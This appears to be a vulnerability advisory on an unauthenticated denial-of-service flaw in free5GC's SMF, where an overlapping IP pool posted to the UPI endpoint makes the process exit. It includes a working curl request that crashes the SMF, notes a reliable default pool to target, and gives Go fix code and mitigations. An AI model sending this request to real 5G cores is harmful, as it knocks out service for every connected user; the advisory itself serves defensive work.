This CVE affects free5GC's Session Management Function (SMF), specifically the User Plane Information (UPI) management route group. The root cause is that the `/upi/v1/upNodesLinks` endpoint is mounted on the Service Based Interface (SBI) without any inbound OAuth2 authentication middleware (CWE-306, Missing Authentication for Critical Function, and CWE-862, Missing Authorization). Any client that can reach the SMF's SBI listener can therefore send arbitrary POST requests to the endpoint without presenting credentials.
The `POST /upi/v1/upNodesLinks` create-or-update handler hands the attacker-controlled JSON body directly to `UpNodesFromConfiguration()` with no validation or sanitization, and it is that function's IP pool overlap check that turns bad input into a crash.
`UpNodesFromConfiguration()` calls `isOverlap(allUEIPPools)` to verify that the new User Plane Function's (UPF) UE IP pool does not collide with pools that are already configured. A collision is treated as a fatal configuration error rather than as a rejected request: the function calls `logger.InitLog.Fatalf("overlap cidr value between UPFs")`, and, like the standard library's `log.Fatalf`, a Fatalf logs the message and then calls `os.Exit(1)`.
That call bypasses every error-handling layer Gin provides. Gin's Recovery middleware can catch a panic raised inside a handler and turn it into an HTTP 500, but `os.Exit` is not a panic: it terminates the whole SMF process immediately, without running deferred functions, so no middleware, `recover()` or in-process supervisor ever gets a chance to respond.
Exploit: A single unauthenticated HTTP request is enough.
Effect: The Docker container running the SMF exits immediately with status `Exited (1)`. Until it is restarted no PDU session can be established or modified through that SMF, which is a Denial of Service (DoS) against the 5G core control plane for every UE it serves.
DailyCVE Form
Platform: free5GC
Version: v4.2.1
Vulnerability: Unauthenticated Process-Kill
Severity: Medium
Date: 2026-05-08
Prediction: Patch already available (SMF 203)
What Undercode Says:
The vulnerability chain is two defects that compound: the UPI route group is mounted without authentication, and `UpNodesFromConfiguration()` uses `logger.InitLog.Fatalf()` to report a request-validation failure. Fatalf ends in `os.Exit(1)`, which kills the process before Gin's middleware could return an error response, so an input-validation bug becomes an unauthenticated remote process kill.
Docker Compose lab validation (the SBI address 10.100.200.6:8000 is the one used in this lab; adjust it for your deployment):

```bash
# 1. Confirm the SMF container is running before the request
docker ps --filter name=smf

# 2. Simulate an attack with a pool that overlaps one the SMF already has configured.
#    Expect no HTTP response: the process exits inside the handler before it can reply.
curl -i -X POST http://10.100.200.6:8000/upi/v1/upNodesLinks \
  -H 'Content-Type: application/json' \
  --data '{"links":[{"A":"gNB1","B":"UPF-OVERLAP"}],"upNodes":{"UPF-OVERLAP":{"type":"UPF","nodeID":"198.51.100.20","addr":"198.51.100.20","sNssaiUpfInfos":[{"sNssai":{"sst":1,"sd":"010203"},"dnnUpfInfoList":[{"dnn":"internet","pools":[{"cidr":"10.60.0.0/16"}]}]}]}}}'

# 3. The container now shows as Exited (1) (-a is needed to list stopped containers) ...
docker ps -a --filter name=smf

# 4. ... and the SMF log ends with the fatal overlap message
docker logs --tail 50 smf | grep -i fatal
```
Exploit:
A remote attacker can repeatedly send crafted HTTP POST JSON payloads to the `UPI` endpoint whose `cidr` values overlap a pool the SMF already has configured; the overlap must be with existing state, but 10.60.0.0/16 is the default UE pool in the stock free5GC `smfcfg.yaml`, so it is a reliable guess against an unmodified deployment. Each such request crashes the SMF process instantly, so a container restart policy only turns the single crash into a crash loop.
Protection from this CVE
- Upgrade: Apply the upstream patch (free5gc/smf 203), which refactors `UpNodesFromConfiguration` to return an error that the handler maps to HTTP 400 instead of calling `Fatalf`, and adds the OAuth2 middleware to the UPI route group. Both halves matter: the authentication fix removes the unauthenticated trigger, and the error-handling fix removes the process kill for callers that are authenticated.
- Network Segmentation: Block inbound traffic to the SBI (TCP/8000 by default) from any segment that does not host the core network functions that need to call it, so an attacker on the RAN, user-plane or management networks cannot reach the vulnerable endpoint at all.
- Runtime Monitoring: Alert on `Exited (1)` container status for `free5gc/smf` images and on rising restart counts; a `restart: always` policy keeps the service nominally up but turns a repeated attack into a crash loop that looks like flapping rather than an outage.
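The vulnerable branch and the fix described above, side by side, as an added example written for this page in Go (free5GC's language); it is not code from free5GC or from the upstream patch. It assumes a reduced payload shape that keeps only the UPF pools from the curl body, a static bearer token standing in for the SBI's OAuth2 middleware, and the stock 10.60.0.0/16 UE pool as the existing state; the function names mirror the page's, the bodies are this example's own.

```go
package main

import (
	"encoding/json"
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/netip"
	"strings"
)

// UPIPayload is an assumed, reduced shape of the upNodesLinks body: only the UPF pools.
type UPIPayload struct {
	UpNodes map[string]struct {
		SNssaiUpfInfos []struct {
			DnnUpfInfoList []struct {
				Pools []struct{ CIDR string `json:"cidr"` } `json:"pools"`
			} `json:"dnnUpfInfoList"`
		} `json:"sNssaiUpfInfos"`
	} `json:"upNodes"`
}
var ErrOverlap = errors.New("overlap cidr value between UPFs")
// attackPayload is a constructed body whose pool collides with the stock free5GC UE pool 10.60.0.0/16.
const attackPayload = `{"upNodes":{"UPF-OVERLAP":{"sNssaiUpfInfos":[{"dnnUpfInfoList":[{"pools":[{"cidr":"10.60.0.0/16"}]}]}]}}}`

// collectPools parses every pool CIDR in the body; bad input is a client error, never a process exit.
func collectPools(body io.Reader) ([]netip.Prefix, error) {
	var p UPIPayload
	if err := json.NewDecoder(body).Decode(&p); err != nil {
		return nil, fmt.Errorf("invalid JSON: %w", err)
	}
	var pools []netip.Prefix
	for name, node := range p.UpNodes {
		for _, s := range node.SNssaiUpfInfos {
			for _, d := range s.DnnUpfInfoList {
				for _, pool := range d.Pools {
					pfx, err := netip.ParsePrefix(pool.CIDR)
					if err != nil {
						return nil, fmt.Errorf("upf %s: bad cidr %q", name, pool.CIDR)
					}
					pools = append(pools, pfx.Masked())
				}
			}
		}
	}
	return pools, nil
}

// isOverlap: two masked prefixes overlap exactly when one contains the other's network address.
func isOverlap(pools []netip.Prefix) bool {
	for i, a := range pools {
		for _, b := range pools[i+1:] {
			if a.Contains(b.Addr()) || b.Contains(a.Addr()) {
				return true
			}
		}
	}
	return false
}

// upNodesFromConfiguration is the hardened form: the overlap check returns an error and the process
// keeps serving. The vulnerable code reaches the same branch and calls logger.InitLog.Fatalf(),
// which is os.Exit(1), so no Gin recovery middleware ever sees the failure.
func upNodesFromConfiguration(existing []netip.Prefix, body io.Reader) ([]netip.Prefix, error) {
	added, err := collectPools(body)
	if err != nil {
		return nil, err
	}
	all := append(append([]netip.Prefix{}, existing...), added...)
	if isOverlap(all) {
		return nil, ErrOverlap // vulnerable version: log.Fatalf("overlap cidr value between UPFs")
	}
	return all, nil
}

// upNodesLinksHandler maps the error to HTTP 400, bounds the body, and commits pools only on success.
func upNodesLinksHandler(pools *[]netip.Prefix) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		merged, err := upNodesFromConfiguration(*pools, io.LimitReader(r.Body, 1<<20))
		if err != nil {
			http.Error(w, err.Error(), http.StatusBadRequest)
			return
		}
		*pools = merged // 200 OK is written implicitly
	}
}

// requireBearer stands in for the auth middleware missing from the UPI route group (static lab
// token is an assumption; the upstream fix mounts the SBI's OAuth2 middleware instead).
func requireBearer(token string, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("Authorization") != "Bearer "+token {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	pools := []netip.Prefix{netip.MustParsePrefix("10.60.0.0/16")} // stock free5GC UE pool
	_, err := upNodesFromConfiguration(pools, strings.NewReader(attackPayload))
	fmt.Println("rejected without exiting:", err)
}
```

Mount the handler as `requireBearer(token, upNodesLinksHandler(&pools))` and the two fixes compose: an unauthenticated caller is stopped at 401 before any parsing happens, and an authenticated caller who submits an overlapping or malformed pool gets a 400 while the pool set, and the process, stay untouched. The overlap rule relies on the prefixes being masked, which `collectPools` guarantees with `Masked()`; without that, `Contains` on an unmasked prefix would still work but the comparison would be harder to reason about.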
Impact:
- Availability: High. A single unauthenticated request crashes the SMF; repeating it keeps the service down, and a restart policy only turns the outage into a crash loop.
- Integrity: None. Crashes do not alter stored data.
- Confidentiality: None. No data extraction occurs.
Sources:
Reported By: github.com